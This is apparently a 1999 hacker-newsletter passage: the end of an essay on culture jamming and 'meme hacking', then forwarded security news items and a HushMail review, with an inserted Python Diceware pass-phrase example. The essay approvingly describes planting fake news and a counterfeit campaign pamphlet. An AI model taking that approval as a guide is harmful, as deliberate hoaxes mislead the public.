and is operationalized in William S. Burroughs's radical treatise, The Electronic
Revolution:
The control of the mass media depends on laying down lines of
association. When the lines are cut the associational connections are
broken.
I have frequently spoken of word and image as viruses or as acting as
viruses, and this is not an allegorical comparison.
You will notice that this process is continually subject to random
juxtaposition. Just what sign did you see in the Green Park station as
you glanced up from the People? Just who called as you were reading
your letter in the Times? What were you reading when your wife broke a
dish in the kitchen? An unreal paper world and yet completely real
because it is actually happening.
The underground press serves as the only effective counter to a
growing power and more sophisticated technique used by
establishment mass media to falsify, misrepresent, misquote, rule out of
consideration as a priori ridiculous or simply ignore and blot out of
existence: data, books, discoveries that they consider prejudicial to
establishment interest.
Consider the human body and nervous system as unscrambling
devices. Remember that when the human nervous system unscrambles
a scrambled message this will seem to the subject like his very own
ideas which just occurred to him.
Consider now the human voice as a weapon. To what extent can the
unaided human voice duplicate effects that can be done with a tape
recorder? Learning to speak with the mouth shut, thus displacing your
speech, is fairly easy. You can also learn to speak backwards, which is
fairly difficult. I have seen people who can repeat what you are saying
after you and finish at the same time. This is a most disconcerting trick,
particularly when practiced on a mass scale at a political rally.
Or, as put less eloquently by the Church of the Subgenius:
We're the Happy People. Happy to live in a world of images. Images of
war. Family. Crime. Fun images, that help rinse away unsightly
self-images, so you can get away from the privacy of your own home.
After all, aren't you what everything's here for? You're what we're here
for. That's why we made everything! That's why everything made you.
And that's why you made us. Who are we?
Hacking Memes
8. Humble Beginnings
Forget the names Jerry Rubin and Abbie Hoffman. The prima donna of
underground radicalism is probably Saul Alinsky, whose anti-establishment and
over-the-top forms of guerilla media propelled a wide variety of alternative causes
into 60s mainstream.
As one Amazon reviewer writes,
Mr. Alinsky captures the outrage organizers have with the status quo.
'Why organize?' is the central question that permeates throughout this
book, and Mr. Alinsky answers this question with a scathing attack on
the powers that be, who are beholden to maintaining the status quo. Mr.
Alinsky allows the reader to not just dream of a better America but doles
out powerful, practical methods to either; A. work within the current
system to effect positive change, or B. bring the system to its knees in
the quest toward positive change. An absolute must read for anyone
wishing to take on the status quo of poverty, injustice, hatred, and
discrimination.
If Alinsky had one major rule (other than "shock them") it was: "use their own rules
against them". Consequently, Alinsky followers employed such radical tools as the
court system, community newspapers, and town hall meetings.
Early meme hackers in the Alinsky mold modified that advice only slightly: use
their own words against them.
Thus, for example, the Billboard Liberation Front
modified public advertising to give common
messages a slightly different - and twisted -
meaning. Beginning in 1977 (by dropping the
"M" in "Max Factor" they highlighted the
disturbing undertones in that company's slogan,
"A pretty face isn't safe in this city") the BLF
conducted a series of highly visible alterations in
the San Francisco Bay area. The BLF was
followed by many others, for example, POPaganda (Ron English). As the
Apocalyptic Optimism for the End of History (Abrupt) puts it,
Culture Jamming sticks where rational discourse slides off. It is, simply,
the viral introduction of radical ideas. It is viral in that it uses the enemy's
own resources to replicate itself -- copy machines, defaced billboards,
web pages. It is radical because--ideally--the message, once deciphered,
causes damage to blind belief. Fake ads, fake newspaper articles,
parodies, pastiche. The best CJ is totally unexpected, surprising,
shocking in its implications.
In a similar vein, Team Seven practised a series of renegade construction activities,
recommending for example to its readers that they raise a flag of their own design
at their local bank after it has closed for the day, or that they set up a reading area
at a predefined other-usage area, such as a car wash or highway median.
The Survival Research Laboratories in San Francisco adopt a more artistic format:
Since its inception SRL has operated as an organization of creative
technicians dedicated to re-directing the techniques, tools, and tenets of
industry, science, and the military away from their typical manifestations
in practicality, product or warfare. Since 1979, SRL has staged over 45
mechanized presentations in the United States and Europe. Each
performance consists of a unique set of ritualized interactions between
machines, robots, and special effects devices, employed in developing
themes of socio-political satire. Humans are present only as audience or
operators.
Meme hacking was limited by technology in the early days. Even Dery could only
identify four major categories:
Sniping and Subvertising (e.g. Adbusters)
Media Hoaxing - Joey Skaggs
Audio Agitprop - e.g. Sucking Chest Wound, whose God Family Country
ponders mobthink and media bias; The Disposable Heroes of Hiphoprisy,
who take aim in "Television, the Drug of the Nation"
Billboard Banditry - e.g. Billboard Liberation Front
Adbusters is a Vancouver based anti-advertising magazine. It is perhaps best
known for Buy Nothing Day and TV Turn-Off Week campaigns. In addition to the
monthly magazine, Adbusters attempts to run anti-consumerism advertisements
on mainstream television. The response from the networks is usually negative;
Adbusters' messages are labelled "controversial" and banned. Its most recent
campaign, Is Economic Progress Killing the Planet, planned for airing during the
G-7 conference in Germany, was rejected by the British Advertising Clearance
Council as unacceptable.
A similar agency is The Centre for Media and
Democracy, which focusses not just on advertising,
but on public relations generally. As the agency's web
site states,
Unlike advertising, public relations is often
hard to recognize. "The best PR is invisible," say
industry insiders. To spin the news in favor of
their clients, PR firms specialize in setting up
phony citizens' groups and scientific "experts"
who spin out contrived research using junk
science.
The Centre's main vehicle, like Adbusters, is a
quarterly magazine, PR Watch, and they have released
two books, Toxic Sludge Is Good For You: Lies, Damn
Lies and the Public Relations Industry (1995) and Mad
Cow USA: Could the Nightmare Happen Here? (1999).
The term Culture Jamming has its origins in the audio agitprop arena, and
specifically, with an experimental-music and art collective known as Negativland.
They write on their website,
Advertising, especially the high tech seduction and emotional button
pushing going on in national brand advertising, has become a special
subject of interest for Negativland because of its telling view into the
successful manipulation of the mass psyche, and the degree to which it
exploits our common mental environment with the promotion of
personal dissatisfaction and constant desire mongering on a universal
scale.
Other anti-meme artists include The Seemen, "a collaborative of some forty odd art
drop outs and extreme technology inventors who enjoy exploring their taste for the
dark side of applied engineering in robot/kinetic art," and the Cacophony Society,
including The Los Angeles Cacophony Society and Cacophony Midwest,
which recently launched the First Annual St. Louis Santa Rampage. "The
Cacophony Society is an open network of creative malcontents, guerrilla artists,
slackers, hooligans, kitsch-hounds, and anyone else interested in subverting
primetime reality. You may already be a member!"
Hacking Memes
9. Electronic Warfare
The meme hackers of the 70s and 80s were marginalized. Their reach was limited,
and social commentary following their acts (and subsequent arrests) was
uniformly negative. Society as a whole - so it seemed - branded them as vandals
and anarchists, radicals and communists.
With the advent of the internet in the late 80s and early 90s, meme hacking was
given a new life. While their access to mainstream media was still limited, activists
could now communicate with each other in rapid, free and uncensored messages.
Moreover, the internet - and especially the world wide web - gave them a means of
reaching directly into the mainstream consciousness, bypassing the media
altogether.
Early electronic meme hacking consisted of two major tactics: slashing, and
spamming.
Slashing is the appropriation of an existing meme for subcultural purposes. The
term "slashing" derives from pornographic "K/S" - short for "Kirk/Spock" - stories
written by Star Trek fans and published in underground fanzines. The theme
unifying such stories is Kirk and Spock's long homosexual affair - an affair only
alluded to in the on-air version of the series.
The development of 'fan fiction' in general - and more recently, fanzines, fan web
sites, and fan discussion boards - has had the effect of removing control of the
'product' from the corporate studio and into the hands of the general public. Star
Trek, in particular, has been the subject of hundreds of fan pages, and when
Paramount attempted to crack down on the sites (in order to promote its
Microsoft-only version), fans rebelled.
The first subversive spam was probably Joe Matheny's deluge of ascii frogs sent
to the White House (in return for which, he received in good order a deluge of
automated reply messages). Matheny quickly wrote a shell program to filter the
auto-replies and return them to their sender, which set up an email loop. With the
advent of its abuse by more corporate interests (ZDNet and Xoom take note),
spamming has declined as a weapon of choice, revealing as it does a general
disregard for its recipients' needs and interests.
An image -
Eduardo Kac led things off with a slide presentation demonstrating how
the Web can become a life source. During his experiment in 1996, people
worldwide were asked to join a teleconference, anytime during a three
week period. The participants simply aimed their cameras to the
heavens so that light on the other end of their transmission could be
used to grow a freshly planted seed, which had been isolated in total
darkness. Through the nourishment of the white lights, the seedling
grew to 18" in height and was later planted outside the Art Institute of
Chicago.
The central question of electronic counterculture revolves around media itself:
who owns it, who controls it, and who uses it. As Jesse Hirsh writes, "We need to
examine the right to communicate, and the communication of our rights." Dery
echoes this theme:
Who will have access to this cornucopia of information, and on what
terms? Will fiber-optic superhighways make stored knowledge
universally available, in the tradition of the public library, or will they
merely facilitate psychological carpet bombing designed to soften up
consumer defenses? And what of the network news? Will it be
superseded by local broadcasts, with their heartwarming (always
"heartwarming") tales of rescued puppies and shocking (always
"shocking") stories of senseless mayhem, mortared together with
airhead banter? Or will the Big Three give way to innumerable news
channels, each a conduit for information about global, national and local
events germane to a specific demographic?
Will cyberpunk telejournalists equipped with Hi-8 video cameras, digital
scanners, and PC-based editing facilities hack their way into legitimate
broadcasts? Or will they, in a medium of almost infinite bandwidth and
channels beyond count, simply be given their own airtime? In short, will
the electronic frontier be wormholed with "temporary autonomous
zones"---Hakim Bey's term for pirate utopias, centrifuges in which social
gravity is artificially suspended---or will it be subdivided and
overdeveloped by what cultural critic Andrew Ross calls "the
military-industrial-media complex?"
The answer lies in the nature of the internet. Everybody will have access to
information. The very nature of cyberspace is that it is interpersonal and
multidirectional. There is no control and - despite the best efforts of the censors -
there is no overseer. We see for the first time the elements of mainstream media on
the retreat, trying to legislate, trying to litigate, trying to appropriate. But as the
nature of cyberspace is communication such efforts will be in vain, for
communication is deeply personal, exactly the opposite of the mass media
message. We see this through concrete examples of anti-meme activities on the
net.
Hacking Memes
10. The Network
The internet is about community. This is a
realization corporate culture realized too late. The
recent received wisdom of electronic commerce
is that to be successful, online advertising must
foster the development of community. But the
countercultural community is already well
established and well entrenched.
Entities such as San Francisco's Laughing Squid
have been using the internet to advertise their
monthly countercultural 'tentacle sessions' for
years now. Alternative 'religions' - such as the
Church of the SubGenius congregate online and
poke fun at mainstream values and culture.
Organizations such as The Center for
Commercial-Free Public Education use the
internet to post messages, coordinate activist
campaigns, and spread information. Activists are able to publicize to each other
the effects of their anti-meme activities, as for example, this post describes the
subversion of a political campaign:
Two weeks ago there was a story that made the headlines in the
newspaper and Compass (PEI's Evening News). The story was that a
pamphlet had been distributed in the riding of Barry Hicken, our Minister
of Environmental Resources. The pamphlet was made to look like a
campaign pamphlet, with pictures of Hicken and the Liberal Party logo. It
stated things like:
- My job as Minister of Environmental Resources has been very
rewarding. I make over $74,000 a year. My wife still can't believe it.
Please, please, please vote for me. I'll get you a job. I promise.
Agencies such as Tao "organize networks in order to defend and expand public
space and the right to self-determination. (They) create knowledge through
independent public interest research, and distribute it freely through participatory
education." Other sites advise and promote subversive activities. The network is
well entrenched and it's growing; there seems to be no interrupting the flow of
communication.
Online activism also enables people to shelter themselves from the mainstream
culture. One recent tactic is called junk busting, which involves using proxy
software to filter banners, cookies, and mask HTTP header data. A similar initiative
attacks Intel and especially Intel's PSN (Processor Serial Number). And the fictional
identity of Luther Bissett - complete with web site and email address - has been
offered to the community at large for "communication guerrilla actions, hacktivism,
civil disobedience (electronic and not) and radical mythopoesis."
Hacking Memes
11. Web Ad Jamming and Spoof Sites
A wide array of anti-advertising sites, home page spoofs, and more express more
clearly than any words the sentiments of the anti-meme movement.
Spoof sites have probably existed since the advent of the World Wide Web, but in
recent months their profile - and the litigation against them - has increased. The
dean of corporate spoof sites is probably ®TMark (pronounced 'Art Mark'). Originally
a secretive and underground agency, ®TMark has entered the public arena.
®TMark is the behind-the-scenes broker of anti-meme mayhem. Projects are
suggested by readers and staff, anonymous donors line up to fund different
projects, and teams of activists carry out the plan. ®TMark pranks have included
switching the voice boxes in G.I. Joe and Barbie dolls, inserting homosexual
couples in Sim Copter Graphics, and online, a scathing spoof site for Shell Oil, and
most recently, a lavish G.W. Bush parody site.
Corporate sites in general are ripe for spoof and parody. Happyclown, Inc. is
an exciting firm devoted to using a fresh and new approach to
Corporate Communications; This young, modern and progressive
Public Relations venture will make the aesthetic sensibilities of the New
Generation available for the use of the familiar and trusted institutions of
the Old Generation.
It is also several other things....
Hole City presents the reader with a sideways
look at media moguls.
"It's a tremendous angle," says
Rupert Murdoch, the media magnate
whose fiery alliance with Satan has
brought him fame, fortune and the Los
Angeles Dodgers. "Our demographics
indicate that Americans respond
positively 53% of the time when we tell
them the truth."
Other anti-corporate sites include Critical Mess Media (CMM), Mess Media's
DisConnection (DisCo), and ZNet Anarchy Watch.
A variation on this theme includes what the Culture Jammer's Encyclopedia calls
News Trolls:
If there's one thing that the left and the right can agree on, it's that the
news is inaccurate, biased, and is more likely to cement popular
prejudice than to uncover uncomfortable truths. So there's a certain
satisfaction in deliberately planting absurd fiction among all the news
that's fit.
Examples of fiction include the Arm the Homeless campaign, a computer that can
replace judges, and the phoney Detroit gang incident.
In Canada, underground tactics are employed by the Gurilla media - "media
monkeywrenching for British Columbia, Canada" - purveyors of the National Post
parody site and the Conrad Black Envy page:
Finally! A website for all of us who are profoundly envious of the
Blacks-- Conrad and Barbara-- commanders-in-chief of the world's
fastest growing press empire. This site is but a humble attempt to
celebrate the Blacks' words and world: their unpretentious persiflage,
personal pecuniary plentitude, pertinacious pedantry, proprietorial
parsimony, perspicacious pomposity, and polymorphous periphrastic
preeminence.
These and more patently false news sites cause some people to warn that "you
can't trust everything you read on the internet". But their subversion is deeper -
they inform the public that "you can't trust everything you read". No wonder news
agencies and academics want to create "authoritative" web news sources.
Another popular tactic reacts to the increasing commercialization of the web. A
number of sites are creating and propagating spoof web ads. Such ads are meme
hacking at its best - they lie generally ignored (check the top of this page) silently
spreading subversion.
Spoof web ads are available on Positive Propaganda's unsorted banner page, from
Chickenhead, Stay Free! Magazine, Abrupt's Holy War Now by 'Tony Alamo', and
The Corporation's twisted children's companion, Cyberbear.
Hacking Memes
12. The Anti-Meme
The anti-meme is probably typified by the Kitty Porn site. The idea is to take an
existing meme, alter it, and thus show its unreasonable or arbitrary nature. This is
not a new idea - it was practised to great effect by the German philosopher
Friedrich Nietzsche ("the transvaluation of value"). But online, such anti-memes
are able for the first time to gain wide currency.
Consider the spoof Alien Visitors Information Centre.
This travelogue site makes fun of
Chamber-of-Commerce inspired tourist brochures. But
there is a deeper transvaluation:
Kurt Waldheim is one of the large, hairy, upright-walking beasts selected
as their leader though the recent United Nations model for better
campground management. As U.N. secretary-general, Waldheim's
personal greetings were launched in Voyagers 1 and 2, travelling AVIC
kiosks in space which also carry the sounds of chimpanzees
screeching. When we made those decisions, the management did not
know Mr. Waldheim helped murder thousands of fellow humans during
something significant called World War II. The employees who were
responsible have been sacked.
The AVIC makes the very simple point that our contemporary culture is still capable
of electing mass-murderers as world leaders, a fact verified by the many ongoing
conflicts and genocides today.
The anti-meme highlights the absurdity and even the moral decay of the
mass-media meme:
Our society spends a lot of time telling us that there is some brand new,
fresh cultural produce, generated from thin air and sunshine, slick and
clean. They package it with pretty plastic & ribbons and then feed it to
us. A lot gets thrown away: the ribbons, the wrapping; culture becomes
garbage, or it dies, and rots behind the refrigerator. But the new fluffy
shiny stuff still gets churned out, and it gets forced between our teeth.
And we are told to swallow it.
We will not swallow. We will chew, and then spit. We will play with our
food, and create something new and interesting from it.
This is similar to the Adbusters "Is Economic Progress Killing Our planet"
campaign, and a host of other messages pointing to the waste and absurdity of the
economic order as it exists today.
The idea is to show that the sanitary culture presented in mass culture isn't the
sanitary and stain-free entity the messages proclaim it to be. "The possibility of
adding pimples to the retouched photo of the face on the cover of America are only
now being seen as artistic territory." The anti-message is very simple: this is not
good.
Corporate and cultural abuses are legion, from the Exxon Valdez oil spill to the
Union Carbide poisoning of tens of thousands of people in Bhopal, India. Yet
criticism is mute. As the Overcoming Consumerism site observes,
The often asked question, "why doesn't the media talk about corporate
power?" and the frequent answer "because the corporations own the
media...", really is a simplification of a wide-ranging process of
power-sharing and wealth-retention that goes more to the kinds of
people behind the corporations than the actual corporations themselves.
The anti-meme is an attack not only on corporate and government policies and
practices, but also on the media messages themselves. Hence, for example, we see
sites such as White Dot, which ask, "What do you do if you don't watch TV?"
References
Adbusters. Agency Website. http://adbusters.org
Adbusters. is Economic Progress Killing the Planet. Media campaign. 1999.
http://adbusters.org/progress/progress.html
Adbusters. Brits miss out on G8 Summit message. Press Release. 1999
http://www.adbusters.org/campaigns/economic-pressrelease.html
Advertising Age. Corporate Web Site. http://www.adage.com/
Alinsky, Saul. Titles, listed at Amazon.com.
http://www.amazon.com/exec/obidos/Author%3DAlinsky%2C%20Saul%20D.
/thecenterformediA/002-3999677-2858208
Apocalyptic Optimism for the End of History. Culture Jamming. Web Site.
http://www.abrupt.org/CJ/CJ.html
Baffler, The. Commodify your dissent. Magazine - counterculture ideas and
opinions. Purchase from http://www.dustygroove.com/baffler.htm
Home site at http://www.thebaffler.org/
Baumgartner, Peter, and Payr, Sabine. Learning as Action: A Social Science
Approach to the Evaluation of Interactive Media. CSS Journal Volume 5 Number 2 -
March/April, 1997. http://www.webcom.com/journal/baumgart.html
Bennahum, David. Meme. Mailing List Web Site. http://memex.org/welcome.html
Bennahum, David. Meme definition.
http://www.ed.cqu.edu.au/~bigumc/Meme/meme_definition.html
Big Brother Inside. Web Site. http://www.bigbrotherinside.com/
Billboard Liberation Front. Agency Web Site. http://www.billboardliberation.com
Blissett, Luther. 'Personal' home page. http://www.syntac.net/lutherblissett/
Burroughs, William S. The Electronic Revolution.
http://www.syntac.net/dl/elerev2.html
Brooks, Meredith. Bitch. 1998. Columbia Records.
http://hollywoodandvine.com/starlandmotel/media/ram/video/
meredithbrooks-bitch.ram
First Annual St. Louis Santa Rampage. Web Site.
http://home.postnet.com/~cacophony/santa.htm
Canadian Broadcasting Corporation. Corporate Web Site. http://www.cbc.ca
Centre for Media and Democracy. Agency Web Site. http://www.prwatch.org/
Channel One Corporate Web Site. http://www.channelone.com
Chickenhead. Zine. http://www.chickenhead.com
CHUM Media Group. Corporate Web Site. http://www.chum.com
Church of the SubGenius. Home Page. http://www.subgenius.com/
Church of the SubGenius. We're the Happy People.
http://www.subgenius.com/bigfist/answers/rants/ad/ad.html
Corcoran, Terence. Attack of the tomato killers. National Post, May 4, 1999.
http://www.nationalpost.com/financialpost.asp?s2=opinion&s3=
theeditor&f=990504/2555310.html
Corporation, The. Parody. http://www.thecorporation.com/
Corporation, The. Cyberbear. Parody. http://www.thecorporation.com/
runninggags/cyberbear/index.html
Critical Mess Media (CMM). Parody site. http://www.rootmedia.org/~messmedia/
Dawkins, Richard. The Selfish Gene. 1976. Book site with excerpts.
http://www.spacelab.net/~catalj/selfpage.htm
Dery, Mark. Culture Jamming: Hacking, Slashing and Sniping at the Empire of
Signs. http://web.nwe.ufl.edu/~mlaffey/cultcover.html
Detritus.net. Zine. Home Page. http://www.detritus.net/
English, Ron. POPaganda: Illegal Billboards. Web Site.
http://www.popaganda.com/Billboards/body_billboards.html
Ewen, Stuart. PR! A Social Theory of Spin. Book Site.
http://www.bway.net/~drstu/
Fisher, Ebon. The Alula Dimension. Web Art. Be patient - dig through it.
http://www.users.interport.net/~outpost/ebon.html
Fisher, Ebon. Mess up your neighbours: The Weird Thing Zone
http://www.users.interport.net/~alula/weirdzone.html
Garton, Andrew. Breaking the Loop: A spoken word / performance lecture. Based
on the Internet/radio installation, Sensorium Connect. satellite Dispatch - Acustica -
2.01 http://www.toysatellite.com.au/news/acustica/201/01.html
Grytting, Wayne. Top NEWSPEAK Stories of the Month #113. Student Activists'
Network. May, 1999. http://san.tao.ca/san01800.html
Guerrilla Media. Home Page. http://www.guerrillamedia.org/
Guerrilla Media. National Post parody site. Parody. http://www.national-post.8m.com/
Guerrilla Media. Conrad Black Envy. Parody. http://www.blackenvy.com/
habitat2@cycor.ca culture jamming before the polls in PEI! Sat, 9 Nov 1996.
http://www.tao.ca/earth/media-l/old/1/0051.html
Hacker's Dictionary, The. Meme
http://www.elsewhere.org/jargon/jargon_28.html#TAG1126
Happyclown, Inc. Parody site. http://www.happyclown.com/mainmenu.html
Hays, Constance L. Math Textbook Salted With Brand Names Raises New Alarm.
NY Times, March 21, 1999. http://metalab.unc.edu/stayfree/public/math_texts.html
Headspace. How to make Trouble and Influence - C is for Culture Jamming.
Headspace Issue #4. http://www.abc.net.au/arts/headspace/rn/bbing/trouble/c.htm
Henderson, Rich. Interview with Joe Matheny. Undated.
Hirsh, Jesse. Culture Jamming: Democracy Now Campus Life 114, November 11,
1998. http://www.campuslife.utoronto.ca/groups/varsity/archives/118/nov11/
feature/culture.html
Idiosyntactix Arts and Sciences Alliance. Home Page. http://www.syntac.net/
Idiosyntactix. Culture-Jammer's Encyclopedia.
http://www.syntac.net/hoax/index.html
JunkBusters. Home Page. http://www.junkbusters.com/
Karrera, Adam. Virtual Slap: A Keynote Presentation Web Review, June 23, 1998
http://webreview.com/wr/pub/web98/tues/keynote.html
Klatte, Arline. "Hey Gang, Let's Put On A Show" Survival Research Labs up against
it...again SF Gate, July 6, 1998
http://www.sfgate.com/cgi-bin/article.cgi?file=/technology/archive/1998/07/06/srl.dtl
Lane, Randall. You are what you wear. Forbes, May 26, 1999.
http://www.forbes.com/forbes/101496/5809042a.htm
Laughing squid. Home Page. http://www.laughingsquid.com/
McDonalds. Corporate Web Site. http://www.mcdonalds.com
McLaren, Carrie. Review of the Baffler Issue 5. 1999?
http://metalab.unc.edu/pub/electronic-publications/stay-free/7/baffler.htm
Mclaren, Carrie. Advertising the Uncommercial. Matador, Issue #6 - 1999?
Messmedia. DisConnection (DisCo). Parody site.
http://messmedia.rootmedia.org/disconnection/
National Post. The National Post. Corporate Web Site. http://www.nationalpost.com
Negativland. Negativeworldwidewebland. Band Web Site.
http://www.negativland.com/
Nike. Corporate Web Site. http://www.nike.com
Overcoming Consumerism. Web Site.
http://www.hooked.net/users/verdant/index.htm
Positive Propaganda. Unsorted Banners. Ad Parodies.
http://www.honeylocust.com/positive/unsort.html
Practical Magic. Movie Web Site. 1998. Warner Brothers.
http://www.practicalmagic.com
Public Broadcasting System. Corporate Web Site. http://www.pbs.org
Principia Cybernetica Web. Memetics. http://pespmc1.vub.ac.be/memes.html
Quebec Public Interest Research Group Liberating Media: a weekend of culture
jamming, media, and community democracy. 1997.
http://www.tao.ca/earth/toronto/archive/1997/toronto00100.html
Reebok. Corporate Web Site. http://www.reebok.com
®TMark. Home Page. http://www.rtmark.com
®TMark. Full Projects List. http://www.rtmark.com/listallprojects.html
®TMark. Shell. (Note - often not listed by DNS Servers - go figure)
http://shell.rtmark.com
®TMark. G.W.Bush.com http://www.gwbush.com
saggau@earthlink.net Review of Rules for Radicals. Amazon.com, December 29,
1998. http://www.amazon.com/exec/obidos/ASIN/0679721134/
002-3999677-2858208
Seemen, The. Society web site. http://www.seemen.org
Sippey, Michael. Live or Memorex?. The Obvious, December 12, 1996.
http://www.theobvious.com/archives/021296.html
Stay Free! Magazine. Home Page. http://metalab.unc.edu/stayfree/
Stay Free! Issue #13 marketing to Kids. Zine.
http://metalab.unc.edu/stayfree/13/index.html
Stay Free! Issue #14 Interview with Stuart Ewen. Zine.
http://metalab.unc.edu/stayfree/14/ewen1.html
Tao. Home Page. http://www.tao.ca
Turner, John. Where Will They Strike Next?. Shift 7.3, May, 1999.
http://www.shift.com/shiftstd/html/onlineTOC/1999/7.3/html/ArtMark1.html
Vanatta, Rob. Meredith Brooks Net. Fan Site. 1997, 1998.
http://web.csuchico.edu/~rvanatta/mbrooks/
Whalen, John. The Mayhem is the Message Metroactive Cyberscape - 1995.
http://www.metroactive.com/cyber/jamming.html
White Dot. Web Site. http://www.whitedot.org/welikeit.html
Woolley, Wayne. Florida reporter falls for phony Detroit gang hoax on Internet The
Detroit News, December 6, 1996.
http://detnews.com/cyberia/culture/961206/hoax/hoax.htm
ZNet. Anarchy Watch. Web Site. http://www.zmag.org/AWatch/awatch.htm
Email Stephen Downes at downes@newstrolls.com
copyright newstrolls.com 1999 all rights reserved!
@HWA
29.0 [ISN] House panel aims to bolster security law
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Fri, 21 May 1999 00:58:50 -0600 (MDT)
From: cult hero <jericho@dimensional.com>
To: InfoSec News <isn@repsec.com>
Subject: [ISN] House panel aims to bolster security law
Forwarded From: William Knowles <erehwon@kizmiaz.dis.org>
http://www.fcw.com/pubs/fcw/1999/0517/web-security-5-20-99.html
House panel aims to bolster security law
(Federal Computer Week) [5.20.99] WASHINGTON, D.C. -- The House Science
Committee plans to make another push to update a 1989 law that requires
civilian agencies to take measures to protect their computer systems,
according to Rep. Constance Morella (R-Md.), chairwoman of the Technology
Subcommittee of the House Science Committee.
The new bill, which could be introduced as early as next week, would
revamp the 10-year-old Computer Security Act. The bill will closely
resemble the Computer Security Enhancement Act of 1997, which the House
passed only to have it die in the Senate last year, said Morella, speaking
at a symposium sponsored by the SmartCard Forum.
Like the 1997 bill, the proposed legislation would tap the National
Institute of Standards and Technology as the lead agency for information
security. The preceding bill also would have required NIST to promote
federal use of commercial off-the-shelf products for civilian security
needs.
The committee first began its effort to revamp the existing law to reflect
the proliferation of network technology that has left agency data more
vulnerable to corruption and theft, Morella said in 1997.
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
@HWA
30.0 [ISN] NSA Taps Universities For Info Security Studies
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Fri, 21 May 1999 01:13:40 -0600 (MDT)
From: cult hero <jericho@dimensional.com>
To: InfoSec News <isn@repsec.com>
Subject: [ISN] NSA Taps Universities For Info Security Studies
Forwarded From: SpyKing@con2.com
NSA Taps Universities For Info Security Studies
The National Security Agency has designated seven U.S. universities as
centers for information-security education, the agency said Tuesday. The
NSA, a super-secret spy agency that wields broad power over U.S.
encryption policy, named two private Virginia universities and a handful
of state universities as Centers of Academic Excellence in Information
Assurance Education. They are: James Madison University, George Mason
University, Idaho State University, Iowa State University, Purdue
University, University of California at Davis, and the University of
Idaho. The centers are expected to become "focal points for recruiting, and
may create a climate to encourage independent research in information
assurance," the NSA said. The agency said the decision to launch the
information-assurance program represented an attempt to reach out and form
partnerships with industry pursuant to a Clinton administration directive
last year on critical infrastructure protection. The seven centers will be
formally recognized during a conference on information-security systems
scheduled for May 25 to 29 at IBM's conference facility in Palisades, N.Y.
<http://www.techweb.com/wire/story/TWB19990512S0005>
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
@HWA
31.0 [ISN] HushMail: free Web-based email with bulletproof encryption
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Sat, 22 May 1999 06:16:04 -0600 (MDT)
From: cult hero <jericho@dimensional.com>
To: InfoSec News <isn@repsec.com>
Subject: [ISN] HushMail: free Web-based email with bulletproof encryption
Forwarded From: Keith Dawson <dawson@world.std.com>
1999-05-19:
..HushMail: free Web-based email with bulletproof encryption
Hush Communications has quietly begun beta testing a significant
development in email privacy. HushMail [1] works like Hotmail or
Rocketmail -- you can set up multiple free accounts and access them from
any Web browser anywhere -- but when you email another HushMail user your
communication is protected by unbreakable encryption. The crypto,
implemented in a downloadable Java applet, was developed outside of US
borders and so has no export limitations.
Here are the FAQ [2] and a more technical overview [3] of the HushMail
system.
HushMail public and private keys are 1024 bits long, and are stored on a
server located in Canada. All information sent between the HushApplet and
the HushMail server is encrypted via the Blowfish symmetric 128-bit
algorithm. The key to this symmetric pipe is randomly generated each
session by the server and is transferred to the client machine over a
secure SSL connection.
When you sign on as a new user you can choose an anonymous account or an
identifiable one. For the latter you have to fill out a demographic
profile, to make you more attractive (in the aggregate) to HushMail's
advertisers. The HushApplet walks you through generating a public-private
key-pair. The process is fun and slick as a smelt. You need to come up
with a secure pass-phrase, and in this process HushMail gives only minimal
guidance. You might want to visit Arnold Reinhold's Diceware page [4],
where he lays out a foolproof pass-phrase protocol utilizing a pair of
dice.
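To make the Diceware protocol the article points to concrete, here is an added example (not Hush's code and not from the article): five dice rolls select one of 6^5 = 7776 equally likely words, so each word contributes about 12.9 bits of entropy, and words_needed() shows how many words it takes to match a given key size such as the 128-bit Blowfish session key described above. The word list is a constructed stand-in for the real Diceware list.

```python
"""Diceware-style pass-phrase generation and entropy estimate.

Added example illustrating the Diceware protocol referenced in the
HushMail article; it is not Hush's code. Each word is chosen by five
six-sided dice, giving 6**5 = 7776 equally likely words, so every word
adds log2(7776) ~ 12.9 bits of entropy regardless of which word it is.
"""
import math
import secrets

DICE_SIDES = 6
DICE_PER_WORD = 5
LIST_SIZE = DICE_SIDES ** DICE_PER_WORD          # 7776
BITS_PER_WORD = math.log2(LIST_SIZE)             # ~12.92 bits

# Constructed stand-in for the real 7776-word Diceware list: word i is
# simply "w<i>". The real list maps each roll such as "11111" to a word.
SAMPLE_WORDLIST = [f"w{i}" for i in range(LIST_SIZE)]


def roll_word() -> str:
    """Simulate five dice rolls with a CSPRNG, returning e.g. '31456'."""
    return "".join(str(secrets.randbelow(DICE_SIDES) + 1)
                   for _ in range(DICE_PER_WORD))


def roll_to_index(roll: str) -> int:
    """Map a five-digit dice roll (digits 1-6) to a 0-based list index.

    '11111' -> 0, '11112' -> 1, ..., '66666' -> 7775 (base-6 arithmetic).
    """
    if len(roll) != DICE_PER_WORD or any(c not in "123456" for c in roll):
        raise ValueError(f"invalid dice roll: {roll!r}")
    index = 0
    for c in roll:
        index = index * DICE_SIDES + (int(c) - 1)
    return index


def passphrase_entropy_bits(num_words: int) -> float:
    """Entropy of a pass-phrase of num_words Diceware words."""
    return num_words * BITS_PER_WORD


def words_needed(target_bits: float) -> int:
    """Smallest word count whose entropy reaches target_bits."""
    return math.ceil(target_bits / BITS_PER_WORD)


def generate_passphrase(num_words: int, wordlist=SAMPLE_WORDLIST) -> str:
    """Roll the dice num_words times and join the selected words."""
    if len(wordlist) != LIST_SIZE:
        raise ValueError("Diceware needs exactly 7776 words")
    return " ".join(wordlist[roll_to_index(roll_word())]
                    for _ in range(num_words))


if __name__ == "__main__":
    for n in (5, 6, 8):
        print(f"{n} words: {passphrase_entropy_bits(n):.1f} bits")
    print("words to match a 128-bit key:", words_needed(128))
    print("sample:", generate_passphrase(6))
```

The entropy comes from the dice, not from the secrecy of the list, so a six-word phrase gives about 77.5 bits and matching a 128-bit symmetric key takes ten words.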
